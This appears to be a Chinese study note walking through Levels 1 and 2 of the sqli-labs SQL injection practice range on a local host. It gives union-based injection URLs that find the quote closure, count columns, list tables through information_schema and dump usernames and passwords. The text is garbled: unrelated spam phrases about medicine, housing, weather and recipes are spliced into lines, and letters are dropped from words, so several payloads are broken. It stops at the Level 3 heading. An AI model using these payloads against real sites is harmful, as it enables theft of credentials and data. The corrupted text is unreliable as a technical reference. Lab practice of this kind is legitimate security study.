sql靶场笔记第⼀关
1、判断闭合符号复方血栓通
通过提交
id=1、?id=1 and 1=1、?id=2
发现有回显
在id后⾯加⼊反斜杠发现是单引号闭合
深圳公租房申请条件在url中加⼊单引号出现报错初一数学题目
2、即单引号字符型注⼊,我们可以使⽤order by X来获取列数(例如:id=1‘order by 1–+这条语句的意思是查询urs表中ur_id 为1的数据并按第⼀字段排⾏)
大理天气15天⽽我们在输⼊id=1’ order by 4–+的时候报错,那么说明数据有三列。
蛋糕脱模3、接下来我们使⽤ union lect 联合查询查看当前的数据库(union 运算符可以将两个或两个以上 lect 语句的查询结果集合合并成⼀个结果集合显⽰,即执⾏联合查询)
即:id=-1’ union lect 1,2,3–+也可以(id=1’ and 1=0 union lect 1,2,3–+)⽬的就是使union前的查询⽆返回结果从⽽返回到执⾏联合查询的结果
判断出数据在2,3列
4、对数据库和表进⾏注⼊获取数据
先查询当前数据库:
127.0.0.1/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect databa()),3--+火锅鸡的制作方法
然后我们⽤group_concat()函数查看库中有哪些表:
额头长痘痘是什么原因怎么调理
127.0.0.1/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect group_concat(table_name) from information_schema.tables where table_schema="s ecurity"),3--+
information_schema:是数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
也可以在第三列⾥爆出表名:只需把union语句放到3的位置就⾏
5、查看urs表⾥⾯的内容
127.0.0.1/sqli-labs-master/Less-1/?id=-1' union lect 1,2,(lect group_concat(column_name) from lumns where table_sche ma="curity" and table_name="urs")--+
6、查看⽤户名和密码
127.0.0.1/sqli-labs-master/Less-1/?id=-1' union lect 1,2,(lect group_concat(urname,password) from urs)--+
第⼆关
1、查看回显
依旧是输⼊?id=1、?id=1 and 1=1、?id=2
后⾯加⼊反斜杠
发现可以不⽤闭合直接查询
那么就跟第⼀关⼀样了,只不过不⽤加单引号。
2、使⽤order by
发现有三列
3、⽤union联合查询
教职工代表大会id=-1union lect 1,2,3--+
4、查看数据库
127.0.0.1/sqli-labs-master/Less-2/?id=-1 union lect 1,(lect group_concat(table_name) from information_schema.tables where table_schema=" curity"),3--+
5、查看表中内容
127.0.0.1/sqli-labs-master/Less-2/?id=-1 union lect 1,2,(lect group_concat(column_name) from lumns where table_sche ma="curity" and table_name="urs")--+
6、获取⽤户名和密码
127.0.0.1/sqli-labs-master/Less-2/?id=-1 union lect 1,2,(lect group_concat(urname,password) from urs)--+
第三关
